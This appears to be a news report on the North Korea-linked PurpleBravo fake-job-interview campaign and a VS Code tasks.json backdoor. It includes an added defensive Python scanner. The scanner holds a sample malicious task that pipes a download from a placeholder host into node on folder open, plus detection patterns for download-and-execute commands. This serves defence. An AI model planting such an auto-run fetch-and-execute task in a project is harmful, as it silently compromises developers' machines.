North Korean-linked hackers have targeted more than 3,100 IP addresses tied to AI, crypto, and finance firms through fake job interviews. The campaign used fraudulent recruiters and malicious coding tasks at global scale.
Recorded Future’s Insikt Group tracked the operation as PurpleBravo and linked it to the ‘Contagious Interview’ playbook. Jamf Threat Labs described a Visual Studio Code, or VS Code, backdoor technique aimed at macOS developers.
Insikt Group said PurpleBravo reached at least 3,136 internet protocol addresses during its monitoring period. The researchers said they have identified 20 victim organizations so far across several regions. Regions cited include South Asia, North America, Europe, the Middle East, and Central America.
Attackers posed as recruiters or developers and sent technical interview exercises, Insikt Group said. They asked candidates to clone repositories, review code, or complete assignments that required running tools.
Insikt Group warned that some candidates likely executed malicious code on corporate machines. Consequently, a single job seeker could create broader organizational exposure beyond the initial target.
Insikt Group said the operation relied on malicious GitHub repositories and fake recruiter outreach. The workflow mirrored common hiring steps, which can reduce scrutiny during take-home tests.
The profiles repeatedly claimed a base in Odessa, Ukraine, while focusing on job seekers from South Asia. Insikt Group said it could not determine why the actors used Ukrainian cover stories.
However, the firm said the personas showed consistent activity across repositories and social media chatter. Insikt Group also outlined infrastructure that supported command-and-control, or C2, operations.
The researchers said the hackers used Astrill VPN and IP ranges to administer China-based C2 servers. In addition, the report said 17 service providers hosted malware infrastructure. Insikt Group cited hosting for components tied to BeaverTail and GolangGhost.
Jamf Threat Labs said North Korea-linked actors abuse VS Code task configuration files for malware delivery. The firm said victims clone GitHub or GitLab projects and open them in VS Code as a job assignment.
Jamf said the tactic was first identified in December 2025 and later refined. The infection chain starts when VS Code prompts a user to trust the repository author.
If the user grants trust, VS Code processes the repository’s tasks.json file, Jamf researcher Thijs Xhaflaire said. Xhaflaire said that processing can trigger arbitrary commands embedded in the configuration.
Jamf said an executed shell command retrieves a JavaScript payload and pipes it into the Node.js runtime. The firm said the payload persists after VS Code closes, then gathers system details and contacts a C2 server. Jamf said the backdoor enables remote code execution and system fingerprinting. It collects operating system information, hostnames, and media access control addresses, and it seeks a public IP.
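As an added, defender-side illustration that is not code from the Jamf or Insikt Group reports, the script below scans a cloned repository's .vscode/tasks.json for the traits the chain described above depends on: a task configured to run automatically when the folder is opened (VS Code's documented runOptions.runOn setting, which is what lets a task fire without the user invoking it), a download tool whose output is piped into node or a shell, and suppressed terminal output. The two sample tasks.json documents, the placeholder host example.invalid, and the regex heuristics are constructed assumptions; a practitioner would run a check like this on a take-home repository before granting Workspace Trust.

```python
import json
import re
from typing import Dict, List

# Constructed sample: a task that auto-runs on folder open and pipes a
# downloaded script into the Node.js runtime. The host is a placeholder,
# not an indicator taken from either report.
SAMPLE_SUSPICIOUS = r'''{
  // VS Code's tasks.json is JSONC, so comments like this one are legal
  "version": "2.0.0",
  "tasks": [
    {
      "label": "prepare workspace",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.js | node",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never", "echo": false }
    }
  ]
}'''

# Constructed sample of an ordinary project tasks.json for comparison.
SAMPLE_BENIGN = r'''{
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "npm", "script": "build", "group": "build" },
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}'''

# Heuristics (assumptions, not a complete list): download tools, a pipe into an
# interpreter, and decode/eval constructs that hide what will actually run.
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm|certutil)\b", re.I)
PIPE_TO_INTERP_RE = re.compile(r"\|\s*(node|sh|bash|zsh|python\d?|powershell|pwsh)\b", re.I)
DECODE_RE = re.compile(r"\b(base64\s+(-d|--decode)|FromBase64String|eval)\b", re.I)
OS_KEYS = ("windows", "osx", "linux")  # per-OS overrides may carry their own command


def strip_jsonc(text: str) -> str:
    """Remove the comment forms VS Code accepts (/* */ blocks and whole-line //)
    plus trailing commas so json.loads can parse the file. Only whole-line //
    comments are stripped, so a URL inside a string is left intact."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return text


def _text(value) -> str:
    """Flatten a tasks.json command/args value (string, {value: ...} or list)."""
    if isinstance(value, dict):
        return str(value.get("value", ""))
    if isinstance(value, list):
        return " ".join(_text(v) for v in value)
    return "" if value is None else str(value)


def task_command_text(task: dict) -> str:
    """Join the task's command and args, including any windows/osx/linux overrides."""
    scopes = [task] + [task[k] for k in OS_KEYS if isinstance(task.get(k), dict)]
    parts = [_text(s.get("command")) + " " + _text(s.get("args")) for s in scopes]
    return " ".join(p.strip() for p in parts if p.strip())


def scan_tasks_json(text: str) -> List[Dict]:
    """Return one finding per task that shows auto-run or download-and-execute traits."""
    data = json.loads(strip_jsonc(text))
    findings: List[Dict] = []
    for task in data.get("tasks", []):
        if not isinstance(task, dict):
            continue
        reasons: List[str] = []
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == "folderOpen":
            reasons.append("runs automatically once the folder is opened and trusted")
        cmd = task_command_text(task)
        if FETCH_RE.search(cmd):
            reasons.append("invokes a download tool")
        if PIPE_TO_INTERP_RE.search(cmd):
            reasons.append("pipes fetched content into an interpreter")
        if DECODE_RE.search(cmd):
            reasons.append("decodes or evals embedded content")
        # Hidden output only matters as a supporting trait, so add it last.
        pres = task.get("presentation") or {}
        if reasons and (pres.get("reveal") == "never" or pres.get("echo") is False):
            reasons.append("hides its terminal output")
        if reasons:
            severity = "high" if run_on == "folderOpen" and len(reasons) > 1 else "medium"
            findings.append({"label": task.get("label", "<unnamed>"),
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for name, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, "->", scan_tasks_json(sample) or "no findings")
```

The check is deliberately read-only: it parses the file without executing any task, so it is safe to run on an untrusted clone. It reports the auto-run setting separately from the command traits because a folderOpen task that only runs npm install is common in real projects, whereas folderOpen combined with a download piped into node has no legitimate reason to appear in an interview exercise.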
Meanwhile, Insikt Group described two remote access trojans, or RATs, used in the broader campaign. The firm cited PylangGhost and GolangGhost as tools that steal browser credentials and cookies.
Insikt Group said GolangGhost supports several operating systems, while PylangGhost targets Windows. The report said PylangGhost can bypass Chrome’s app-bound credential protection on version 127 and later.
Insikt Group framed the latest activity against the backdrop of more than $2 billion in crypto theft in 2025. Still, both reports urged caution with unfamiliar repositories, especially before marking them trusted in VS Code.
Consequently, the findings suggest continued risk for hiring pipelines in AI, crypto, and financial services. Insikt Group said it continues tracking PurpleBravo as tactics shift across regions and platforms.